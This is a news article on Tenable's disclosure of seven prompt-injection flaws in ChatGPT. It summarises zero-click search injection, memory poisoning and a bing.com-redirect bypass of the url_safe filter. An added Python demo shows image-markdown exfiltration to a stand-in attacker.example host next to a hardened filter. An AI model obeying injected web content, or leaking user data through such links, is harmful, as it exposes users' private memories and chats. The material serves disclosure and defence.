Tenable Research has disclosed seven critical vulnerabilities in OpenAI’s ChatGPT, affecting both GPT-4o and the newly released GPT-5, that could allow attackers to steal private user data through stealthy, zero-click exploits.
The flaws center on indirect prompt injection: attacker-controlled text that the model ingests while browsing or searching is treated as instructions, letting an attacker manipulate the AI into exfiltrating sensitive information from user memories and chat histories with no user interaction beyond an ordinary query.
With hundreds of millions of daily users relying on large language models like ChatGPT, this discovery highlights the urgent need for stronger AI safeguards in an era where LLMs are becoming primary information sources.
The vulnerabilities stem from ChatGPT’s core architecture, which relies on system prompts, memory tools, and web browsing features to deliver contextual responses.
OpenAI’s system prompt outlines the model’s capabilities, including a “bio” tool for long-term user memories, enabled by default, and a “web” tool for internet access via search or URL browsing.
Memories store details from past conversations that the model deems important, while the web tool delegates browsing to a secondary model, SearchGPT, which is meant to be isolated from the user’s context so that fetched content can neither read private data nor steer the main conversation.
However, Tenable researchers found that SearchGPT’s isolation is insufficient: prompt injections in the content it processes can propagate back into ChatGPT’s own context.

Novel Attack Techniques Exposed
Among the seven vulnerabilities, a standout is the zero-click indirect prompt injection in the Search Context: attackers publish websites crafted to be indexed for niche topics, so that an innocent question about such a topic causes SearchGPT to fetch and process the injected page.
Here are short summaries of all seven ChatGPT vulnerabilities discovered by Tenable Research:
- Indirect Prompt Injection via Browsing Context: Attackers hide malicious instructions in places like blog comments, which SearchGPT processes and summarizes for users, compromising the session without raising suspicion.
- Zero-Click Indirect Prompt Injection in Search Context: Attackers index websites with malicious prompts that trigger automatically when users ask innocent questions, leading to manipulated responses without any user clicks or interaction.
- One-Click Prompt Injection via URL Parameter: Users clicking on crafted links (e.g., chatgpt.com/?q=malicious_prompt) unknowingly cause ChatGPT to execute attacker-controlled instructions.
- url_safe Safety Mechanism Bypass: Attackers leverage allowlisted bing.com tracking links, which redirect to attacker-controlled destinations, to get malicious URLs past OpenAI’s url_safe filter and exfiltrate user data.
- Conversation Injection: Attackers inject instructions into SearchGPT’s output that ChatGPT reads and executes from conversational context, effectively prompting itself and enabling chained exploits.
- Malicious Content Hiding: By abusing a markdown rendering flaw, attackers can hide injected prompts from the user’s view while the model still sees and acts on them.
- Persistent Memory Injection: Attackers manipulate ChatGPT into updating its persistent memory with exfiltration instructions, so private data keeps leaking in future sessions and interactions.
Proofs of Concept and OpenAI’s Response
Tenable demonstrated full attack chains, for example phishing via blog comments that steer users to malicious links, or image markdown that exfiltrates information by routing it through the url_safe bypass.
In PoCs against both GPT-4o and GPT-5, attackers phished users by having ChatGPT summarize rigged blogs, or hijacked search results to plant persistent memories that keep leaking data across sessions. These scenarios underscore how everyday tasks like asking for dinner ideas could unwittingly expose personal details.
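To make the url_safe bypass and the image-markdown exfiltration channel concrete, here is an added example in Python. It is not Tenable’s PoC and not OpenAI’s code: a toy filter that, like the url_safe mechanism described above, allowlists rendered image URLs by hostname, placed next to a hardened variant that applies the allowlist to the resolved redirect destination. The allowlist, the shape of the bing.com tracking link, and the redirect table standing in for live HTTP requests are all assumptions constructed for the demonstration.

```python
# Added example (not Tenable's or OpenAI's code): a hostname allowlist in the
# style of url_safe, bypassed by an allowlisted redirector, and a hardened check
# that validates the resolved destination instead of the literal hostname.
import re
from typing import Callable, Dict, List
from urllib.parse import urlparse

ALLOWED_HOSTS = {"bing.com", "www.bing.com"}  # assumption: hosts the renderer trusts

# Markdown image syntax ![alt](url); the URL is what the client would fetch.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def url_safe_naive(url: str) -> bool:
    """Weak check: trusts any URL whose hostname is on the allowlist, so an
    allowlisted open redirector passes even though its destination is not."""
    return host_of(url) in ALLOWED_HOSTS


def url_safe_hardened(url: str, resolve: Callable[[str], str], max_hops: int = 5) -> bool:
    """Follow the redirect chain through a caller-supplied resolver and require
    every hop, including the final destination, to be allowlisted. Only hosts
    that already passed the allowlist are ever handed to the resolver."""
    current = url
    for _ in range(max_hops + 1):
        if host_of(current) not in ALLOWED_HOSTS:
            return False
        nxt = resolve(current)
        if nxt == current:
            return True  # terminal URL, and it is allowlisted
        current = nxt
    return False  # redirect chain too long: treat as unsafe


def extract_image_urls(markdown: str) -> List[str]:
    return MD_IMAGE.findall(markdown)


def render_decision(markdown: str, checker: Callable[[str], bool]) -> Dict[str, bool]:
    """Map each image URL in the model's output to whether the filter lets it render."""
    return {url: checker(url) for url in extract_image_urls(markdown)}


# Constructed URLs for the demonstration. The tracking-link shape is assumed;
# the "u" value is an arbitrary placeholder, not a real encoding.
TRACKING = "https://www.bing.com/ck/a?u=a1aHR0cHM6Ly9hdHRhY2tlci5leGFtcGxlL2xlYWs"
DIRECT = "https://attacker.example/direct?m=ZGluZ"
LEGIT = "https://www.bing.com/th?id=OIP.legit"

# Constructed redirect table standing in for an HTTP HEAD request that reads
# the Location header without following it.
FAKE_REDIRECTS = {TRACKING: "https://attacker.example/leak?m=ZGluZ"}


def fake_resolve(url: str) -> str:
    return FAKE_REDIRECTS.get(url, url)


# Constructed model output carrying an injected exfiltration image.
INJECTED_OUTPUT = (
    "Here is a dinner idea for tonight.\n"
    f"![]({TRACKING})\n"
    f"![]({DIRECT})\n"
    f"![]({LEGIT})\n"
)

if __name__ == "__main__":
    print("naive   :", render_decision(INJECTED_OUTPUT, url_safe_naive))
    print("hardened:", render_decision(INJECTED_OUTPUT, lambda u: url_safe_hardened(u, fake_resolve)))
```

The naive filter lets the tracking link render because its hostname is bing.com, and the client’s image fetch then follows the redirect to attacker.example with whatever the injected prompt encoded into the link. The hardened variant blocks it because the allowlist is applied to where the request ends up, not to the first hostname in the string.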
Tenable disclosed the issues to OpenAI, which has since fixed some of them; the findings are documented in Tenable’s research advisories TRA-2025-22, TRA-2025-11, and TRA-2025-06.
Despite the fixes, prompt injection remains an inherent LLM challenge, and several of the PoCs still work against GPT-5. Experts urge AI vendors to test safety mechanisms rigorously, since reliance on an isolated component like SearchGPT proves fragile once individual weaknesses are chained together.
As LLMs evolve to rival traditional search engines, these HackedGPT findings serve as a wake-up call for users and enterprises to scrutinize AI dependencies and implement external monitoring.
